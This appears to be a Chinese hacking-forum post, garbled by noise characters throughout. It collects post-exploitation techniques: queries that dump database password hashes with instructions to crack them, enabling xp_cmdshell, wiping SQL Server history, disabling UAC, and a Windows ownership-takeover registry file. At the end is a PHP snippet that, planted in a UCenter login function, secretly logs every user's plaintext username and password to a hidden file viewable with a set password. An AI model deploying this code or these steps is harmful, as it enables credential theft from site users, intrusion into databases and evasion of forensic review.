( b' M% Z$ r' |: E4 i6 @/ ~: S. j0 y6 p, G3 M0 g: j" D5 }' Z
各种类型数据库抓HASH破解最高权限密码!
+ h+ ~7 w; R+ I$ Y. D1.sql server20005 C f; m) k2 D# j
SELECT password from master.dbo.sysxlogins where name='sa'
2 a0 G% e. A2 }0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
3 [# D$ X/ D, J- K2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
# n/ S0 ~+ ^, A' m
' n4 {! f: ]/ o; q, Y. s) J; k0×0100- constant header
o& ?5 L8 y8 ^' X) J/ y6 K34767D5C- salt& a3 g2 D# P! y, E
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2 B3 r# C3 ?; |( I7 k y7 Z8 a2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash4 _( v* q0 S: ]# `3 ~ U: L
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
; U2 |6 a$ E& q# sSQL server 2005:-0 K& S/ ~5 P- Y* s
SELECT password_hash FROM sys.sql_logins where name='sa'
& d; \8 ~! d' |% V. X1 s8 D$ c0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F: ], x6 i5 o+ f( j+ R: O
0×0100- constant header
6 h+ g+ Z8 W% m0 A; x993BF231-salt# o6 k2 j- I3 I
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; {/ j0 d" G0 C1 @: k8 Qcrack case sensitive hash in cain, try brute force and dictionary based attacks.
4 \1 w- z$ i, S7 T& [
, M$ W1 P; a# R7 ]update:- following bernardo’s comments:-
$ h9 @) z0 H0 a: V) i* O7 \use function fn_varbintohexstr() to cast password in a hex string.- w* c2 r& i& G5 P3 R% l
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins; `. q; X$ i0 D2 C- I
& O; g! i0 G7 N# r- z; t* T" V
MYSQL:-: u8 @5 b1 W4 D) x* ~
a3 Y3 G% Q; o& JIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
8 W; v7 @' S! k x1 K- b* }; s
. C4 [! Y) J2 f# U- D0 L% j*mysql < 4.1# K2 w* h. A8 a9 ]
. f" j2 |/ S- f) P
mysql> SELECT PASSWORD(‘mypass’);; ?% u$ Q$ o! K$ ^* ^% Z! G
+——————–+ t0 A. A% I5 e/ D e2 N
| PASSWORD(‘mypass’) |
/ w" G* c1 F7 Y- N+——————–+/ A/ _ g* G* ^9 K% L' [
| 6f8c114b58f2ce9e |
7 M9 V/ H( h Q( b$ M1 |2 X1 e+——————–+6 @% M' h; T& ?: ~$ t0 v& l
1 ~9 Q0 U2 Q i) x/ `2 p) i! `*mysql >=4.1, K/ d% R$ o3 h5 L" l0 m( A7 K
?7 n& }) p5 v5 H7 L# H' G& o7 Zmysql> SELECT PASSWORD(‘mypass’); \% M. ?+ u& g% y+ b1 L1 R5 w
+——————————————-+
; C( B* J3 X. S2 E4 p) ^, ~8 A| PASSWORD(‘mypass’) |0 E* B; n E4 ?4 O4 q3 E
+——————————————-+' z2 F, e6 W9 ~- A) B; n
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |1 o1 p/ j9 C7 n* O+ y8 ]; J5 H: z7 D
+——————————————-+
5 z9 W) q. B2 H- m7 v
5 w: Z/ H( C& Q; S, U( p3 e' SSelect user, password from mysql.user5 g9 ?) j4 E* S% q0 l7 ~
The hashes can be cracked in ‘cain and abel’ n+ H' ?3 [( v$ u
$ }; b; F: `5 b1 G% `' J. {
Postgres:-
+ o5 r5 ]6 `( M) B9 oPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
1 J2 v& _/ f# M1 eselect usename, passwd from pg_shadow;8 P1 ~& d6 u- ^4 q$ o# [3 d2 m
usename | passwd
- a. W! U/ J% o& ~) Y3 y/ [0 x; ]——————+————————————-. \9 R# W2 r1 N
testuser | md5fabb6d7172aadfda4753bf0507ed43966 C$ Q: {1 V5 o$ ]- J; @" r9 f V
use mdcrack to crack these hashes:-6 U4 R# `# ~& y8 W9 ]
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396* A) Q O; r/ D
& w f/ |7 B' D' y" Q
Oracle:-4 Y) j: Z6 `' Q7 \+ |
select name, password, spare4 from sys.user$
+ b4 }4 l- s L: i/ S) r, ~hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
' Q4 E& K- T' }* D' w" k" SMore on Oracle later, i am a bit bored….& u) h+ V9 x- w$ [: N
0 K5 c# L2 N K" A1 t+ c0 D1 ?& t; e5 n6 ]' X" U
在sql server2005/2008中开启xp_cmdshell0 s6 M0 e/ Z+ T( a& c: x
-- To allow advanced options to be changed.. n) h/ V$ _% r3 E
EXEC sp_configure 'show advanced options', 1, k% G* g$ V5 \, c$ T) n7 M# i
GO7 U% x% Z& A; H% l: U; z7 N
-- To update the currently configured value for advanced options.
1 K! _2 f* W' Q! C* JRECONFIGURE
$ u' q9 f! @& D) a7 g( j4 W: AGO% A! S4 C/ p' `0 g1 i4 O8 {; D
-- To enable the feature." ?: a w6 x* f) ?. I3 c7 G
EXEC sp_configure 'xp_cmdshell', 1
" j1 ~: n! s: e# u3 H( D6 TGO5 [) v6 E7 y1 ?6 N
-- To update the currently configured value for this feature." T4 R6 n6 |2 l
RECONFIGURE
" s' z5 ~8 r- x* M2 R0 f4 @GO
$ a. A# w8 B( \$ b$ DSQL 2008 server日志清除,在清楚前一定要备份。% R5 ^7 x4 T4 F+ ~
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
/ m% K3 j) {4 m0 Q( w1 z7 CX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin& K6 q) t; E+ ?. ~3 q
$ V8 [: i" l1 a1 K$ S$ _对于SQL Server 2008以前的版本:
: F: a% {- u1 J' M0 e, uSQL Server 2005:0 q* E5 x1 _( Y! D; U$ |
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat8 b" r" w1 C6 c4 Z0 }
SQL Server 2000:$ H: v( e, u' W8 c/ b( y3 n2 B8 x3 a
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。7 z; @$ d, J. B/ K0 j# `
5 |& f: m5 A L; E* X& D8 t) t本帖最后由 simeon 于 2013-1-3 09:51 编辑8 _ ]$ v& ^' m0 ?
1 c7 _, c- i& J" n, O" i
6 a; `5 G' O) s7 ]- X& Uwindows 2008 文件权限修改! V1 K- n. ]$ j7 s' d
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx) ], N6 N/ f3 [' ]2 h/ `
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
' c8 R4 @# ~! J# l* a: j一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
6 @+ P* J. K7 g/ q1 Z8 i) _
& F: p" ]" v. t8 W9 [Windows Registry Editor Version 5.00* l! y# O) C. j# G$ w
[HKEY_CLASSES_ROOT\*\shell\runas]& I4 }! t" B( w6 w
@="管理员取得所有权"
. i, \) u. B- D _5 y"NoWorkingDirectory"=""
* \$ f3 V5 _( [( I; N- \% F[HKEY_CLASSES_ROOT\*\shell\runas\command]
" W5 J- O; E5 y# l' c! A6 E@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# _& Y$ w, r; ] B4 ?
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": J8 ~+ E8 z+ j7 b# t0 L. C
[HKEY_CLASSES_ROOT\exefile\shell\runas2]) a; O, @% v1 Q9 Y9 R ~
@="管理员取得所有权"& a( [: @% p+ D9 L
"NoWorkingDirectory"=""
( a& c$ I7 J. S; ] c. L# t e& t[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]* l) T" H; A( K; @' j# ?
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 P: Z1 M) p: N3 y0 l1 I2 j"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' O3 t4 h4 K0 ]% y7 b& R5 F3 H; E% c* d: i
[HKEY_CLASSES_ROOT\Directory\shell\runas]% E& n; G. ~. U/ q+ F5 D
@="管理员取得所有权"
! r7 r6 R) w+ q" M"NoWorkingDirectory"=""5 h+ p! x; t3 }0 p5 c' M2 s+ q
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
* U: _4 W% y0 S5 G9 Z@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t") S5 t8 F3 N# h$ F6 y* J: Z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
O( v2 s8 G* L
B, D' j4 ] G H, A3 i" H/ K$ p7 H. H( g2 A& f/ H4 i
win7右键“管理员取得所有权”.reg导入2 R+ i$ h8 H/ x
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,& S; P, X, B J( r: a5 y4 n
1、C:\Windows这个路径的“notepad.exe”不需要替换
( I/ h7 H! X& f0 ?2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
: [5 }1 N8 T4 j" K* k3、四个“notepad.exe.mui”不要管
! k8 o, e2 H/ }* J) U4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
; s% p/ f0 R; K( M5 |6 h- eC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
2 j% |0 W4 m# f- B) m4 b8 O! N4 f替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,) K0 c8 \. ^2 u0 z0 O
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
@3 C+ N% P) q, o/ E8 mwindows 2008中关闭安全策略:
1 L5 l& {0 w; n! o0 b% Breg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f) d9 E8 C2 C) R" \5 {
修改uc_client目录下的client.php 在
# j6 T' l! r) ?, X lfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {( Y- r3 b0 I7 ^) Q1 n% n- F
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ X3 _# n- Y9 \' \- K$ Y你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw5 I2 I$ R3 o- ^! M
if(getenv('HTTP_CLIENT_IP')) {
4 ^4 @. z! k" x$onlineip = getenv('HTTP_CLIENT_IP');
: g- z8 e2 a! G# a} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
& _ E G [* P$ v# C4 g$onlineip = getenv('HTTP_X_FORWARDED_FOR');( X& w9 l- o; D: \
} elseif(getenv('REMOTE_ADDR')) {3 k6 o. w/ z% M, F8 y% O, W
$onlineip = getenv('REMOTE_ADDR');
1 ~& `2 h8 p! Y( S} else {* U/ @$ @* J) e) H, G( P" b: E
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];4 Q/ }( ?* F6 J0 K
}3 T5 g$ z ?! N7 G
$showtime=date("Y-m-d H:i:s");
9 ^# F6 M& m* H, F' X $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n"; \7 O5 }$ f M
$handle=fopen('./data/cache/csslog.php','a+');
! m; y1 y; `+ @8 l $write=fwrite($handle,$record); |